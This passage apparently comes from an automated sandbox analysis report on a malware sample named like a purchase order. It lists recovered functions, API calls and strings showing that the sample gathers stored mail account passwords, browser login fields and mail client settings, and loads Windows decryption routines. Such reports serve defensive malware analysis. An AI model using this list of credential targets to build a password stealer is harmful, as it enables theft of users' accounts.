                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                        • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                        • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                        • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                        Non-executed Functions

                                        Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                        • API String ID: 2238633743-192783356
                                        • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                        • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                        • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                        • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                        Function 00402DB3 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                          • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                          • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                        • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                        • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                        • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                        • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                        • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy$QueryValue$CloseOpen
                                        • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                        • API String ID: 52435246-1534328989
                                        • Opcode ID: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                        • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                        • Opcode Fuzzy Hash: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                        • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                        Function 00406DFC Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EmptyClipboard.USER32 ref: 00406E06
                                          • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                        • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                        • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                        • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                        • GetLastError.KERNEL32 ref: 00406E74
                                        • CloseHandle.KERNEL32(?), ref: 00406E80
                                        • GetLastError.KERNEL32 ref: 00406E8B
                                        • CloseClipboard.USER32 ref: 00406E94
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                        • String ID:
                                        • API String ID: 3604893535-0
                                        • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                        • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                        • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                        • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                        Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString_mbscmpstrlen
                                        • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                        • API String ID: 3963849919-1658304561
                                        • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                        • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                        • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                        • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                        Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID: (yE$(yE$(yE
                                        • API String ID: 1865533344-362086290
                                        • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                        • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                        • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                        • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                        Function 00442D8E Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strlen.MSVCRT ref: 004431AD
                                        • strncmp.MSVCRT ref: 004431BD
                                        • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                        • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                        • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                        • API String ID: 1895597112-3210201812
                                        • Opcode ID: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
                                        • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                        • Opcode Fuzzy Hash: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
                                        • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                        Function 00443C71 Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                        • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                        • API String ID: 1714764973-479759155
                                        • Opcode ID: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                        • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                        • Opcode Fuzzy Hash: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                        • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                        Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040EBD8
                                          • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                        • memset.MSVCRT ref: 0040EC2B
                                        • memset.MSVCRT ref: 0040EC47
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                        • memset.MSVCRT ref: 0040ECDD
                                        • memset.MSVCRT ref: 0040ECF2
                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                        • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                        • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                        • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                        • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                        • memset.MSVCRT ref: 0040EDE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                        • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                        • API String ID: 3137614212-1455797042
                                        • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                        • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                        • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                        • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                        Function 0040DD7B Relevance: 66.3, APIs: 28, Strings: 16, Instructions: 303stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                        • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                        • API String ID: 2814039832-2206097438
                                        • Opcode ID: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                        • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                        • Opcode Fuzzy Hash: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                        • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                        Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                          • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                          • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                          • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                        • memset.MSVCRT ref: 0040E5B8
                                        • memset.MSVCRT ref: 0040E5CD
                                        • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                        • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                        • memset.MSVCRT ref: 0040E6B5
                                        • memset.MSVCRT ref: 0040E6CC
                                          • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                          • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                        • memset.MSVCRT ref: 0040E736
                                        • memset.MSVCRT ref: 0040E74F
                                        • sprintf.MSVCRT ref: 0040E76D
                                        • sprintf.MSVCRT ref: 0040E788
                                        • _strcmpi.MSVCRT ref: 0040E79E
                                        • _strcmpi.MSVCRT ref: 0040E7B7
                                        • _strcmpi.MSVCRT ref: 0040E7D3
                                        • memset.MSVCRT ref: 0040E858
                                        • sprintf.MSVCRT ref: 0040E873
                                        • _strcmpi.MSVCRT ref: 0040E889
                                        • _strcmpi.MSVCRT ref: 0040E8A5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                        • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                        • API String ID: 4171719235-3943159138
                                        • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                        • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                        • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                        • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                        Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                        • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                        • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                        • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                        • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                        • GetWindowRect.USER32(?,?), ref: 00410487
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                        • GetDC.USER32 ref: 004104E2
                                        • strlen.MSVCRT ref: 00410522
                                        • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                        • ReleaseDC.USER32(?,?), ref: 00410580
                                        • sprintf.MSVCRT ref: 00410640
                                        • SetWindowTextA.USER32(?,?), ref: 00410654
                                        • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                        • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                        • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                        • GetClientRect.USER32(?,?), ref: 004106DD
                                        • GetWindowRect.USER32(?,?), ref: 004106E7
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                        • GetClientRect.USER32(?,?), ref: 00410737
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                        • String ID: %s:$EDIT$STATIC
                                        • API String ID: 1703216249-3046471546
                                        • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                        • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                        • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                        • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                        Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004024F5
                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                        • _mbscpy.MSVCRT(?,00000000,?,?,?,7568EB20,?,00000000), ref: 00402533
                                        • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy$QueryValuememset
                                        • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                        • API String ID: 168965057-606283353
                                        • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                        • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                        • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                        • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                        Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00402869
                                          • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                        • _mbscpy.MSVCRT(?,?,7568EB20,?,00000000), ref: 004028A3
                                          • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7568EB20,?,00000000), ref: 0040297B
                                          • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                        • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                        • API String ID: 1497257669-167382505
                                        • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                        • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                        • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                        • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                        Function 0040FC40 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EndDialog.USER32(?,?), ref: 0040FC88
                                        • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                        • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
